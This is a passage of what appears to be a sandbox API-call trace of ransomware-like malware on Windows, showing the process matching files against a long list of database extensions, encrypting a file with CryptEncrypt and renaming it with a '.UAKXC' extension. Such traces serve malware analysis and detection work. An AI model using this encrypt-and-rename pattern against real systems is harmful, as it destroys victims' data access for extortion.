lpSrch=".jet") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.308] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mud") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".myd") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nv") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0141.309] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".odb") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".orx") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".owc") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".p96") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".p97") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".pan") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".qry") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rod") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".scx") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0141.310] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sis") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".spq") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sql") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".te") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".temx") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".tps") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".trc") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".trm") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".udb") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".udl") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".usr") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".v12") returned 0x0 [0141.311] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpSrch=".vis") returned=".VISIO.14.1033.hxn" [0141.311] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.311] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0141.313] WriteFile (in: hFile=0x6cc, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0141.313] SetEndOfFile (hFile=0x6cc) returned 1 [0141.313] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.313] ReadFile (in: hFile=0x6cc, lpBuffer=0x4b20000, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0x146, lpOverlapped=0x0) returned 1 [0141.313] SetFilePointerEx (in: hFile=0x6cc, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.313] WriteFile (in: hFile=0x6cc, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0x146, lpOverlapped=0x0) returned 1 [0141.313] CloseHandle (hObject=0x6cc) returned 1 [0141.315] GetProcessHeap () returned 0xea0000 [0141.315] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef34d0 [0141.315] lstrcpyW (in: lpString1=0xef34d0, lpString2="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" [0141.315] lstrcatW (in: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn", lpString2=".UAKXC" | out: lpString1="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.UAKXC") returned="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.UAKXC" [0141.315] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn"), lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.visio.14.1033.hxn.uakxc")) returned 1 [0141.316] GetProcessHeap () returned 0xea0000 [0141.316] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0141.316] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeef058 | out: hHeap=0xea0000) returned 1 [0141.316] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef26c8 | out: hHeap=0xea0000) returned 1 [0141.316] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0141.316] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0141.316] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0141.317] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn")) returned 0x2022 [0141.401] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0141.401] GetLastError () returned 0x0 [0141.401] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=362) returned 1 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accde") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0141.401] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".accft") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".adb") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ade") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".adf") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".adp") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".arc") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ora") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".alf") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ask") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".btr") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".cat") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".cma") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dad") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0141.402] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".db") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".db3") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dct") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0141.403] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".eco") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".edb") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".epim") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".exb") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fic") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fol") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0141.404] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".frm") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".his") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ib") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".idb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".itw") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".jet") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0141.405] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".maf") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".maq") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mar") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mas") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mav") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0141.406] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft 